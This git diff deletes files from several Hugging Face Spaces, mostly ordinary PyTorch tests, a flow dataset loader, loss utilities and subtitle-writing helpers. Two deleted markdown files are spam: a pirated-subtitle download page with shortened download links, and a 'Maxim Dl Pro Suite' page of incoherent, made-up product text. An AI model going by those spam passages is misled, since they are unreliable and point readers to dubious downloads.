frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr_mem_efficient(frame)) - - out = torch.cat(outs, dim=1) - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -def test_cross_attention(): - torch.manual_seed(1234) - for norm_first in [True, False]: - m = StreamingTransformer( - 16, 4, 2, cross_attention=False, norm_first=norm_first, dropout=0., custom=True) - m_cross = StreamingTransformer( - 16, 4, 2, cross_attention=True, norm_first=norm_first, dropout=0., custom=True) - m_cross.load_state_dict(m.state_dict(), strict=False) - x = torch.randn(2, 5, 16) - cross_x = torch.randn(2, 3, 16) - y_ref = m(x) - y_cross_zero = m_cross(x, cross_attention_src=0 * cross_x) - # With norm_first, the two should be exactly yhe same, - # but with norm_first=False, we get 2 normalization in a row - # and the epsilon value leads to a tiny change. - atol = 0. if norm_first else 1e-6 - print((y_ref - y_cross_zero).norm() / y_ref.norm()) - assert torch.allclose(y_ref, y_cross_zero, atol=atol) - - # We now expect a difference even with a generous atol of 1e-2. 
- y_cross = m_cross(x, cross_attention_src=cross_x) - assert not torch.allclose(y_cross, y_cross_zero, atol=1e-2) - - with pytest.raises(AssertionError): - _ = m_cross(x) - _ = m(x, cross_attention_src=cross_x) - - -def test_cross_attention_compat(): - torch.manual_seed(1234) - num_heads = 2 - dim = num_heads * 64 - with pytest.raises(AssertionError): - StreamingMultiheadAttention(dim, num_heads, causal=True, cross_attention=True) - - cross_attn = StreamingMultiheadAttention( - dim, num_heads, dropout=0, cross_attention=True, custom=True) - ref_attn = torch.nn.MultiheadAttention(dim, num_heads, dropout=0, batch_first=True) - - # We can load the regular attention state dict - # so we have compat when loading old checkpoints. - cross_attn.load_state_dict(ref_attn.state_dict()) - - queries = torch.randn(3, 7, dim) - keys = torch.randn(3, 9, dim) - values = torch.randn(3, 9, dim) - - y = cross_attn(queries, keys, values)[0] - y_ref = ref_attn(queries, keys, values)[0] - assert torch.allclose(y, y_ref, atol=1e-7) - - # Now let's check that streaming is working properly. - with cross_attn.streaming(): - ys = [] - for step in range(queries.shape[1]): - ys.append(cross_attn(queries[:, step: step + 1], keys, values)[0]) - y_streaming = torch.cat(ys, dim=1) - assert torch.allclose(y_streaming, y, atol=1e-7) - - -def test_repeat_kv(): - torch.manual_seed(1234) - num_heads = 8 - kv_repeat = 4 - dim = num_heads * 64 - with pytest.raises(AssertionError): - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, cross_attention=True) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, custom=True) - x = torch.randn(4, 18, dim) - y = mha(x, x, x)[0] - assert x.shape == y.shape - - -def test_qk_layer_norm(): - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, bias_attn=False) - steps = 12 - x = torch.randn(3, steps, 16) - y = tr(x) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, cross_attention=True) - z = torch.randn(3, 21, 16) - y = tr(x, cross_attention_src=z) - assert y.shape == x.shape diff --git a/spaces/subhajitmaji/MusicGen/tests/modules/test_rope.py b/spaces/subhajitmaji/MusicGen/tests/modules/test_rope.py deleted file mode 100644 index 067c6f067acbf27fb0fef5c2b812c22474c4fcd0..0000000000000000000000000000000000000000 --- a/spaces/subhajitmaji/MusicGen/tests/modules/test_rope.py +++ /dev/null @@ -1,168 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. 
- -import torch - -from audiocraft.modules.rope import RotaryEmbedding -from audiocraft.modules.transformer import StreamingTransformer, set_efficient_attention_backend - - -def test_rope(): - set_efficient_attention_backend('xformers') - B, T, H, C = 8, 75, 16, 128 - - rope = RotaryEmbedding(dim=C) - xq = torch.rand((B, T, H, C)) - xk = torch.rand((B, T, H, C)) - xq_out, xk_out = rope.rotate_qk(xq, xk, start=7) - - assert list(xq_out.shape) == [B, T, H, C] - assert list(xk_out.shape) == [B, T, H, C] - - -def test_rope_io_dtypes(): - set_efficient_attention_backend('xformers') - B, T, H, C = 8, 75, 16, 128 - - rope_32 = RotaryEmbedding(dim=C, dtype=torch.float32) - rope_64 = RotaryEmbedding(dim=C, dtype=torch.float64) - - # Test bfloat16 inputs w/ both 32 and 64 precision rope. - xq_16 = torch.rand((B, T, H, C)).to(torch.bfloat16) - xk_16 = torch.rand((B, T, H, C)).to(torch.bfloat16) - xq_out, xk_out = rope_32.rotate_qk(xq_16, xk_16) - assert xq_out.dtype == torch.bfloat16 - xq_out, xk_out = rope_64.rotate_qk(xq_16, xk_16) - assert xq_out.dtype == torch.bfloat16 - - # Test float32 inputs w/ both 32 and 64 precision rope. - xq_32 = torch.rand((B, T, H, C)).to(torch.float32) - xk_32 = torch.rand((B, T, H, C)).to(torch.float32) - xq_out, xk_out = rope_32.rotate_qk(xq_32, xk_32) - assert xq_out.dtype == torch.float32 - xq_out, xk_out = rope_64.rotate_qk(xq_32, xk_32) - assert xq_out.dtype == torch.float32 - - -def test_transformer_with_rope(): - set_efficient_attention_backend('xformers') - torch.manual_seed(1234) - for pos in ['rope', 'sin_rope']: - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1, - positional_embedding=pos) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - out = tr(x) - assert list(out.shape) == list(x.shape) - - -@torch.no_grad() -def test_rope_streaming(): - set_efficient_attention_backend('xformers') - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, causal=True, dropout=0., - custom=True, positional_embedding='rope') - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - ref = tr(x) - - with tr.streaming(): - outs = [] - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr(frame)) - - out = torch.cat(outs, dim=1) - assert list(out.shape) == [3, steps, 16] - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -@torch.no_grad() -def test_rope_streaming_past_context(): - set_efficient_attention_backend('xformers') - torch.manual_seed(1234) - - for context in [None, 10]: - tr = StreamingTransformer( - 16, 4, 1 if context else 2, - causal=True, past_context=context, custom=True, - dropout=0., positional_embedding='rope') - tr.eval() - - steps = 20 - x = torch.randn(3, steps, 16) - ref = tr(x) - - with tr.streaming(): - outs = [] - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr(frame)) - - out = torch.cat(outs, dim=1) - assert list(out.shape) == [3, steps, 16] - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -def test_rope_memory_efficient(): - set_efficient_attention_backend('xformers') - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1, - positional_embedding='rope') - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, layer_scale=0.1, - positional_embedding='rope') - 
tr_mem_efficient.load_state_dict(tr.state_dict()) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_mem_efficient(x) - # Check at float precision b/c this is the rope default. - assert torch.allclose(y, y2, atol=1e-7), (y - y2).norm() - - -def test_rope_with_xpos(): - set_efficient_attention_backend('xformers') - B, T, H, C = 8, 75, 16, 128 - - rope = RotaryEmbedding(dim=C, xpos=True) - xq = torch.rand((B, T, H, C)) - xk = torch.rand((B, T, H, C)) - xq_out, xk_out = rope.rotate_qk(xq, xk, start=7) - - assert list(xq_out.shape) == [B, T, H, C] - assert list(xk_out.shape) == [B, T, H, C] - - -def test_positional_scale(): - set_efficient_attention_backend('xformers') - B, T, H, C = 8, 75, 16, 128 - - rope = RotaryEmbedding(dim=C, xpos=True, scale=0.0) - xq = torch.rand((B, T, H, C)) - xk = torch.rand((B, T, H, C)) - xq_out, xk_out = rope.rotate_qk(xq, xk, start=7) - - assert torch.allclose(xq, xq_out) - assert torch.allclose(xk, xk_out) diff --git a/spaces/subhc/Guess-What-Moves/datasets/flow_pair_detectron.py b/spaces/subhc/Guess-What-Moves/datasets/flow_pair_detectron.py deleted file mode 100644 index cac5a4c1b073dbfffc947a13fc369bbeebce871d..0000000000000000000000000000000000000000 --- a/spaces/subhc/Guess-What-Moves/datasets/flow_pair_detectron.py +++ /dev/null @@ -1,275 +0,0 @@ -import math -from pathlib import Path -import random - -import detectron2.data.transforms as DT -import einops -import numpy as np -import torch -import torch.nn.functional as F -import torchvision.transforms as T -from PIL import Image -from detectron2.data import detection_utils as d2_utils -from detectron2.structures import Instances, BitMasks -from torch.utils.data import Dataset - -from utils.data import read_flow, read_flo - - -def load_flow_tensor(path, resize=None, normalize=True, align_corners=True): - """ - Load flow, scale the pixel values according to the resized scale. - If normalize is true, return rescaled in normalized pixel coordinates - where pixel coordinates are in range [-1, 1]. 
- NOTE: RAFT USES ALIGN_CORNERS=TRUE SO WE NEED TO ACCOUNT FOR THIS - Returns (2, H, W) float32 - """ - flow = read_flo(path).astype(np.float32) - H, W, _ = flow.shape - h, w = (H, W) if resize is None else resize - u, v = flow[..., 0], flow[..., 1] - if normalize: - if align_corners: - u = 2.0 * u / (W - 1) - v = 2.0 * v / (H - 1) - else: - u = 2.0 * u / W - v = 2.0 * v / H - else: - h, w = resize - u = w * u / W - v = h * v / H - - if h != H or w !=W: - u = Image.fromarray(u).resize((w, h), Image.ANTIALIAS) - v = Image.fromarray(v).resize((w, h), Image.ANTIALIAS) - u, v = np.array(u), np.array(v) - return torch.from_numpy(np.stack([u, v], axis=0)) - - -class FlowPairDetectron(Dataset): - def __init__(self, data_dir, resolution, to_rgb=False, size_divisibility=None, enable_photo_aug=False, flow_clip=1., norm=True, read_big=True, force1080p=False, flow_res=None): - self.eval = eval - self.to_rgb = to_rgb - self.data_dir = data_dir - self.flow_dir = {k: [e for e in v if e.shape[0] > 0] for k, v in data_dir[0].items()} - self.flow_dir = {k: v for k, v in self.flow_dir.items() if len(v) > 0} - self.resolution = resolution - self.size_divisibility = size_divisibility - self.ignore_label = -1 - self.transforms = DT.AugmentationList([ - DT.Resize(self.resolution, interp=Image.BICUBIC), - ]) - self.photometric_aug = T.Compose([ - T.RandomApply(torch.nn.ModuleList([T.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.2, hue=0.1)]), - p=0.8), - T.RandomGrayscale(p=0.2), - ]) if enable_photo_aug else None - self.flow_clip=flow_clip - self.norm_flow=norm - self.read_big = read_big - self.force1080p_transforms = None - if force1080p: - self.force1080p_transforms = DT.AugmentationList([ - DT.Resize((1088, 1920), interp=Image.BICUBIC), - ]) - self.big_flow_resolution = flow_res - - def __len__(self): - return sum([cat.shape[0] for cat in next(iter(self.flow_dir.values()))]) if len( - self.flow_dir.values()) > 0 else 0 - - def __getitem__(self, idx): - - dataset_dicts = [] - - random_gap = random.choice(list(self.flow_dir.keys())) - flowgaps = self.flow_dir[random_gap] - vid = random.choice(flowgaps) - flos = random.choice(vid) - dataset_dict = {} - - fname = Path(flos[0]).stem - dname = Path(flos[0]).parent.name - suffix = '.png' if 'CLEVR' in fname else '.jpg' - rgb_dir = (self.data_dir[1] / dname / fname).with_suffix(suffix) - gt_dir = (self.data_dir[2] / dname / fname).with_suffix('.png') - - flo0 = einops.rearrange(read_flow(str(flos[0]), self.resolution, self.to_rgb), 'c h w -> h w c') - flo1 = einops.rearrange(read_flow(str(flos[1]), self.resolution, self.to_rgb), 'c h w -> h w c') - if self.big_flow_resolution is not None: - flo0_big = einops.rearrange(read_flow(str(flos[0]), self.big_flow_resolution, self.to_rgb), 'c h w -> h w c') - flo1_big = einops.rearrange(read_flow(str(flos[1]), self.big_flow_resolution, self.to_rgb), 'c h w -> h w c') - rgb = d2_utils.read_image(rgb_dir).astype(np.float32) - original_rgb = torch.as_tensor(np.ascontiguousarray(np.transpose(rgb, (2, 0, 1)).clip(0., 255.))).float() - if self.read_big: - rgb_big = d2_utils.read_image(str(rgb_dir).replace('480p', '1080p')).astype(np.float32) - rgb_big = (torch.as_tensor(np.ascontiguousarray(rgb_big))[:, :, :3]).permute(2, 0, 1).clamp(0., 255.) 
- if self.force1080p_transforms is not None: - rgb_big = F.interpolate(rgb_big[None], size=(1080, 1920), mode='bicubic').clamp(0., 255.)[0] - - # print('not here', rgb.min(), rgb.max()) - input = DT.AugInput(rgb) - - # Apply the augmentation: - preprocessing_transforms = self.transforms(input) # type: DT.Transform - rgb = input.image - if self.photometric_aug: - rgb_aug = Image.fromarray(rgb.astype(np.uint8)) - rgb_aug = self.photometric_aug(rgb_aug) - rgb_aug = d2_utils.convert_PIL_to_numpy(rgb_aug, 'RGB') - rgb_aug = np.transpose(rgb_aug, (2, 0, 1)).astype(np.float32) - rgb = np.transpose(rgb, (2, 0, 1)) - rgb = rgb.clip(0., 255.) - # print('here', rgb.min(), rgb.max()) - d2_utils.check_image_size(dataset_dict, flo0) - if gt_dir.exists(): - sem_seg_gt = d2_utils.read_image(str(gt_dir)) - sem_seg_gt = preprocessing_transforms.apply_segmentation(sem_seg_gt) - # sem_seg_gt = cv2.resize(sem_seg_gt, (self.resolution[1], self.resolution[0]), interpolation=cv2.INTER_NEAREST) - if sem_seg_gt.ndim == 3: - sem_seg_gt = sem_seg_gt[:, :, 0] - if sem_seg_gt.max() == 255: - sem_seg_gt = (sem_seg_gt > 128).astype(int) - else: - sem_seg_gt = np.zeros((self.resolution[0], self.resolution[1])) - - - gwm_dir = (Path(str(self.data_dir[2]).replace('Annotations', 'gwm')) / dname / fname).with_suffix('.png') - if gwm_dir.exists(): - gwm_seg_gt = d2_utils.read_image(str(gwm_dir)) - gwm_seg_gt = preprocessing_transforms.apply_segmentation(gwm_seg_gt) - gwm_seg_gt = np.array(gwm_seg_gt) - # gwm_seg_gt = cv2.resize(gwm_seg_gt, (self.resolution[1], self.resolution[0]), interpolation=cv2.INTER_NEAREST) - if gwm_seg_gt.ndim == 3: - gwm_seg_gt = gwm_seg_gt[:, :, 0] - if gwm_seg_gt.max() == 255: - gwm_seg_gt[gwm_seg_gt == 255] = 1 - else: - gwm_seg_gt = None - - if sem_seg_gt is None: - raise ValueError( - "Cannot find 'sem_seg_file_name' for semantic segmentation dataset {}.".format( - dataset_dict["file_name"] - ) - ) - - # Pad image and segmentation label here! 
- if self.to_rgb: - flo0 = torch.as_tensor(np.ascontiguousarray(flo0.transpose(2, 0, 1))) / 2 + .5 - flo0 = flo0 * 255 - flo1 = torch.as_tensor(np.ascontiguousarray(flo1.transpose(2, 0, 1))) / 2 + .5 - flo1 = flo1 * 255 - if self.big_flow_resolution is not None: - flo0_big = torch.as_tensor(np.ascontiguousarray(flo0_big.transpose(2, 0, 1))) / 2 + .5 - flo0_big = flo0_big * 255 - flo1_big = torch.as_tensor(np.ascontiguousarray(flo1_big.transpose(2, 0, 1))) / 2 + .5 - flo1_big = flo1_big * 255 - else: - flo0 = torch.as_tensor(np.ascontiguousarray(flo0.transpose(2, 0, 1))) - flo1 = torch.as_tensor(np.ascontiguousarray(flo1.transpose(2, 0, 1))) - - if self.norm_flow: - flo0 = flo0 / (flo0 ** 2).sum(0).max().sqrt() - flo1 = flo1 / (flo1 ** 2).sum(0).max().sqrt() - - flo0 = flo0.clip(-self.flow_clip, self.flow_clip) - flo1 = flo1.clip(-self.flow_clip, self.flow_clip) - - if self.big_flow_resolution is not None: - flo0_big = torch.as_tensor(np.ascontiguousarray(flo0_big.transpose(2, 0, 1))) - flo1_big = torch.as_tensor(np.ascontiguousarray(flo1_big.transpose(2, 0, 1))) - if self.norm_flow: - flo0_big = flo0_big / (flo0_big ** 2).sum(0).max().sqrt() - flo1_big = flo1_big / (flo1_big ** 2).sum(0).max().sqrt() - flo0_big = flo0_big.clip(-self.flow_clip, self.flow_clip) - flo1_big = flo1_big.clip(-self.flow_clip, self.flow_clip) - - rgb = torch.as_tensor(np.ascontiguousarray(rgb)) - if self.photometric_aug: - rgb_aug = torch.as_tensor(np.ascontiguousarray(rgb_aug)) - - if sem_seg_gt is not None: - sem_seg_gt = torch.as_tensor(sem_seg_gt.astype("long")) - if gwm_seg_gt is not None: - gwm_seg_gt = torch.as_tensor(gwm_seg_gt.astype("long")) - - if self.size_divisibility > 0: - image_size = (flo0.shape[-2], flo0.shape[-1]) - padding_size = [ - 0, - int(self.size_divisibility * math.ceil(image_size[1] // self.size_divisibility)) - image_size[1], - 0, - int(self.size_divisibility * math.ceil(image_size[0] // self.size_divisibility)) - image_size[0], - ] - flo0 = F.pad(flo0, padding_size, value=0).contiguous() - flo1 = F.pad(flo1, padding_size, value=0).contiguous() - rgb = F.pad(rgb, padding_size, value=128).contiguous() - if self.photometric_aug: - rgb_aug = F.pad(rgb_aug, padding_size, value=128).contiguous() - if sem_seg_gt is not None: - sem_seg_gt = F.pad(sem_seg_gt, padding_size, value=self.ignore_label).contiguous() - if gwm_seg_gt is not None: - gwm_seg_gt = F.pad(gwm_seg_gt, padding_size, value=self.ignore_label).contiguous() - - image_shape = (rgb.shape[-2], rgb.shape[-1]) # h, w - - # Pytorch's dataloader is efficient on torch.Tensor due to shared-memory, - # but not efficient on large generic data structures due to the use of pickle & mp.Queue. - # Therefore it's important to use torch.Tensor. 
- dataset_dict["flow"] = flo0 - dataset_dict["flow_2"] = flo1 - - # dataset_dict["flow_fwd"] = flo_norm_fwd - # dataset_dict["flow_bwd"] = flo_norm_bwd - # dataset_dict["flow_rgb"] = rgb_flo0 - # dataset_dict["flow_gap"] = gap - - dataset_dict["rgb"] = rgb - dataset_dict["original_rgb"] = original_rgb - if self.read_big: - dataset_dict["RGB_BIG"] = rgb_big - if self.photometric_aug: - dataset_dict["rgb_aug"] = rgb_aug - - if self.big_flow_resolution is not None: - dataset_dict["flow_big"] = flo0_big - dataset_dict["flow_big_2"] = flo1_big - - - if sem_seg_gt is not None: - dataset_dict["sem_seg"] = sem_seg_gt.long() - - if gwm_seg_gt is not None: - dataset_dict["gwm_seg"] = gwm_seg_gt.long() - - if "annotations" in dataset_dict: - raise ValueError("Semantic segmentation dataset should not have 'annotations'.") - - # Prepare per-category binary masks - if sem_seg_gt is not None: - sem_seg_gt = sem_seg_gt.numpy() - instances = Instances(image_shape) - classes = np.unique(sem_seg_gt) - # remove ignored region - classes = classes[classes != self.ignore_label] - instances.gt_classes = torch.tensor(classes, dtype=torch.int64) - - masks = [] - for class_id in classes: - masks.append(sem_seg_gt == class_id) - - if len(masks) == 0: - # Some image does not have annotation (all ignored) - instances.gt_masks = torch.zeros((0, sem_seg_gt.shape[-2], sem_seg_gt.shape[-1])) - else: - masks = BitMasks( - torch.stack([torch.from_numpy(np.ascontiguousarray(x.copy())) for x in masks]) - ) - instances.gt_masks = masks.tensor - - dataset_dict["instances"] = instances - dataset_dicts.append(dataset_dict) - - return dataset_dicts diff --git a/spaces/superprpogresor/Bringing-Old-Photos-Back-to-Life/README.md b/spaces/superprpogresor/Bringing-Old-Photos-Back-to-Life/README.md deleted file mode 100644 index 64d68975396ef963de6572f3f977e934b5d66ddd..0000000000000000000000000000000000000000 --- a/spaces/superprpogresor/Bringing-Old-Photos-Back-to-Life/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Bringing Old Photos Back To Life -emoji: 🐢 -colorFrom: purple -colorTo: indigo -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Ip Man 4 English Subtitles Downloadl.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Ip Man 4 English Subtitles Downloadl.md deleted file mode 100644 index 4cab47d17254a9561284e4da402469ef4643e9ec..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Ip Man 4 English Subtitles Downloadl.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Ip Man 4 English Subtitles Downloadl


      Download Zip ->->->-> https://cinurl.com/2uEZ6A



      -
-English subtitles ready for download, The Hitman's Bodyguard 2 2020 720p, ... Movie Ip Man 3 in (Hindi Dubbed) Part 2 Action Movie download in HD mp4, 3Gp, ... Business Plan Template Software Free Downloadl 1fdad05405
      -
      -
      -

      diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Maxim Dl Pro Suite 5.12 NEW.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Maxim Dl Pro Suite 5.12 NEW.md deleted file mode 100644 index fa8997c161762840c92dd2f030f7b14f7b2ea217..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Maxim Dl Pro Suite 5.12 NEW.md +++ /dev/null @@ -1,28 +0,0 @@ -

      Maxim Dl Pro Suite 5.12


      Download File 🔗 https://cinurl.com/2uEYJX



      - -Easy to use, MaxIm DL Pro is available for Mac, Windows and Linux operating systems, and on any web browser. - -Deep Space Pro uses a single "unified" command-line utility that is invoked from within Deep Space Pro, and from the command line. - -To the right is an example command to load images into Deep Space Pro from the command line. - -For more information on using Deep Space Pro, please see the Guide to Using Deep Space Pro, found at the bottom of this page. - -Now let's look at the Deep Space Pro Viewer. This Viewer lets you browse the images, videos, and panoramas stored in Deep Space Pro, or on your hard drive. It shows the thumbnail views of an image file, and each thumbnail can be expanded to full screen for a better view. - -Deep Space Pro provides a number of preferences which you can customize. The Preferences window can be found by clicking on the button at the top left of the main window. - -Among the many features of Deep Space Pro is its ability to use a non-default JPG compression quality setting for JPEG images. In addition, the JPEG compression quality setting can be set at any time, and even set to the default. - -If your camera, storage device, or data are lossy, you may wish to use the option of Maximum Quality Compression. Doing so saves image quality, but at the expense of the storage space required for the image. - -Likewise, you may want to specify a lower compression for your JPEG images. If you are using a camera which has JPEG quality compression, it is recommended to use a lower quality setting. Do this by specifying a value of -1 for the JPEG quality setting. - -You can also use the JPEG quality setting to create a custom JPG file. This gives you the ability to select a JPEG quality setting that best suits your needs. However, the JPEG quality setting can only be changed after an image has been written to disk. If you specify a JPEG quality setting, you will still see the default JPEG quality setting specified in the Preferences window. - -The red digital watermark is found on each image taken by Deep Space Pro. It indicates the date and time that the image was captured, the camera used, the lens focal length, and the camera orientation. - -The digital watermark will appear in the top-left corner of each image. When the image is in full screen view, the watermark will also be displayed 4fefd39f24
      -
      -
      -

      diff --git a/spaces/svjack/ControlNet-Pose-Chinese/annotator/uniformer/mmseg/models/losses/utils.py b/spaces/svjack/ControlNet-Pose-Chinese/annotator/uniformer/mmseg/models/losses/utils.py deleted file mode 100644 index 85aec9f3045240c3de96a928324ae8f5c3aebe8b..0000000000000000000000000000000000000000 --- a/spaces/svjack/ControlNet-Pose-Chinese/annotator/uniformer/mmseg/models/losses/utils.py +++ /dev/null @@ -1,121 +0,0 @@ -import functools - -import annotator.uniformer.mmcv as mmcv -import numpy as np -import torch.nn.functional as F - - -def get_class_weight(class_weight): - """Get class weight for loss function. - - Args: - class_weight (list[float] | str | None): If class_weight is a str, - take it as a file name and read from it. - """ - if isinstance(class_weight, str): - # take it as a file path - if class_weight.endswith('.npy'): - class_weight = np.load(class_weight) - else: - # pkl, json or yaml - class_weight = mmcv.load(class_weight) - - return class_weight - - -def reduce_loss(loss, reduction): - """Reduce loss as specified. - - Args: - loss (Tensor): Elementwise loss tensor. - reduction (str): Options are "none", "mean" and "sum". - - Return: - Tensor: Reduced loss tensor. - """ - reduction_enum = F._Reduction.get_enum(reduction) - # none: 0, elementwise_mean:1, sum: 2 - if reduction_enum == 0: - return loss - elif reduction_enum == 1: - return loss.mean() - elif reduction_enum == 2: - return loss.sum() - - -def weight_reduce_loss(loss, weight=None, reduction='mean', avg_factor=None): - """Apply element-wise weight and reduce loss. - - Args: - loss (Tensor): Element-wise loss. - weight (Tensor): Element-wise weights. - reduction (str): Same as built-in losses of PyTorch. - avg_factor (float): Avarage factor when computing the mean of losses. - - Returns: - Tensor: Processed loss values. - """ - # if weight is specified, apply element-wise weight - if weight is not None: - assert weight.dim() == loss.dim() - if weight.dim() > 1: - assert weight.size(1) == 1 or weight.size(1) == loss.size(1) - loss = loss * weight - - # if avg_factor is not specified, just reduce the loss - if avg_factor is None: - loss = reduce_loss(loss, reduction) - else: - # if reduction is mean, then average the loss by avg_factor - if reduction == 'mean': - loss = loss.sum() / avg_factor - # if reduction is 'none', then do nothing, otherwise raise an error - elif reduction != 'none': - raise ValueError('avg_factor can not be used with reduction="sum"') - return loss - - -def weighted_loss(loss_func): - """Create a weighted version of a given loss function. - - To use this decorator, the loss function must have the signature like - `loss_func(pred, target, **kwargs)`. The function only needs to compute - element-wise loss without any reduction. This decorator will add weight - and reduction arguments to the function. The decorated function will have - the signature like `loss_func(pred, target, weight=None, reduction='mean', - avg_factor=None, **kwargs)`. - - :Example: - - >>> import torch - >>> @weighted_loss - >>> def l1_loss(pred, target): - >>> return (pred - target).abs() - - >>> pred = torch.Tensor([0, 2, 3]) - >>> target = torch.Tensor([1, 1, 1]) - >>> weight = torch.Tensor([1, 0, 1]) - - >>> l1_loss(pred, target) - tensor(1.3333) - >>> l1_loss(pred, target, weight) - tensor(1.) 
- >>> l1_loss(pred, target, reduction='none') - tensor([1., 1., 2.]) - >>> l1_loss(pred, target, weight, avg_factor=2) - tensor(1.5000) - """ - - @functools.wraps(loss_func) - def wrapper(pred, - target, - weight=None, - reduction='mean', - avg_factor=None, - **kwargs): - # get element-wise loss - loss = loss_func(pred, target, **kwargs) - loss = weight_reduce_loss(loss, weight, reduction, avg_factor) - return loss - - return wrapper diff --git a/spaces/syy404/whisper-webui/src/utils.py b/spaces/syy404/whisper-webui/src/utils.py deleted file mode 100644 index b85a7f3ff5c2e3e94823f4e1bf181e54edb1ddf9..0000000000000000000000000000000000000000 --- a/spaces/syy404/whisper-webui/src/utils.py +++ /dev/null @@ -1,115 +0,0 @@ -import textwrap -import unicodedata -import re - -import zlib -from typing import Iterator, TextIO - - -def exact_div(x, y): - assert x % y == 0 - return x // y - - -def str2bool(string): - str2val = {"True": True, "False": False} - if string in str2val: - return str2val[string] - else: - raise ValueError(f"Expected one of {set(str2val.keys())}, got {string}") - - -def optional_int(string): - return None if string == "None" else int(string) - - -def optional_float(string): - return None if string == "None" else float(string) - - -def compression_ratio(text) -> float: - return len(text) / len(zlib.compress(text.encode("utf-8"))) - - -def format_timestamp(seconds: float, always_include_hours: bool = False, fractionalSeperator: str = '.'): - assert seconds >= 0, "non-negative timestamp expected" - milliseconds = round(seconds * 1000.0) - - hours = milliseconds // 3_600_000 - milliseconds -= hours * 3_600_000 - - minutes = milliseconds // 60_000 - milliseconds -= minutes * 60_000 - - seconds = milliseconds // 1_000 - milliseconds -= seconds * 1_000 - - hours_marker = f"{hours:02d}:" if always_include_hours or hours > 0 else "" - return f"{hours_marker}{minutes:02d}:{seconds:02d}{fractionalSeperator}{milliseconds:03d}" - - -def write_txt(transcript: Iterator[dict], file: TextIO): - for segment in transcript: - print(segment['text'].strip(), file=file, flush=True) - - -def write_vtt(transcript: Iterator[dict], file: TextIO, maxLineWidth=None): - print("WEBVTT\n", file=file) - for segment in transcript: - text = process_text(segment['text'], maxLineWidth).replace('-->', '->') - - print( - f"{format_timestamp(segment['start'])} --> {format_timestamp(segment['end'])}\n" - f"{text}\n", - file=file, - flush=True, - ) - - -def write_srt(transcript: Iterator[dict], file: TextIO, maxLineWidth=None): - """ - Write a transcript to a file in SRT format. 
- Example usage: - from pathlib import Path - from whisper.utils import write_srt - result = transcribe(model, audio_path, temperature=temperature, **args) - # save SRT - audio_basename = Path(audio_path).stem - with open(Path(output_dir) / (audio_basename + ".srt"), "w", encoding="utf-8") as srt: - write_srt(result["segments"], file=srt) - """ - for i, segment in enumerate(transcript, start=1): - text = process_text(segment['text'].strip(), maxLineWidth).replace('-->', '->') - - # write srt lines - print( - f"{i}\n" - f"{format_timestamp(segment['start'], always_include_hours=True, fractionalSeperator=',')} --> " - f"{format_timestamp(segment['end'], always_include_hours=True, fractionalSeperator=',')}\n" - f"{text}\n", - file=file, - flush=True, - ) - -def process_text(text: str, maxLineWidth=None): - if (maxLineWidth is None or maxLineWidth < 0): - return text - - lines = textwrap.wrap(text, width=maxLineWidth, tabsize=4) - return '\n'.join(lines) - -def slugify(value, allow_unicode=False): - """ - Taken from https://github.com/django/django/blob/master/django/utils/text.py - Convert to ASCII if 'allow_unicode' is False. Convert spaces or repeated - dashes to single dashes. Remove characters that aren't alphanumerics, - underscores, or hyphens. Convert to lowercase. Also strip leading and - trailing whitespace, dashes, and underscores. - """ - value = str(value) - if allow_unicode: - value = unicodedata.normalize('NFKC', value) - else: - value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii') - value = re.sub(r'[^\w\s-]', '', value.lower()) - return re.sub(r'[-\s]+', '-', value).strip('-_') \ No newline at end of file diff --git a/spaces/t13718236382/web-ui/_next/static/css/60ec184094fe2bcc.css b/spaces/t13718236382/web-ui/_next/static/css/60ec184094fe2bcc.css deleted file mode 100644 index 67dcb7698c21d38c409d5fc739bba2c8e20aa370..0000000000000000000000000000000000000000 --- a/spaces/t13718236382/web-ui/_next/static/css/60ec184094fe2bcc.css +++ /dev/null @@ -1 +0,0 @@ -@media 
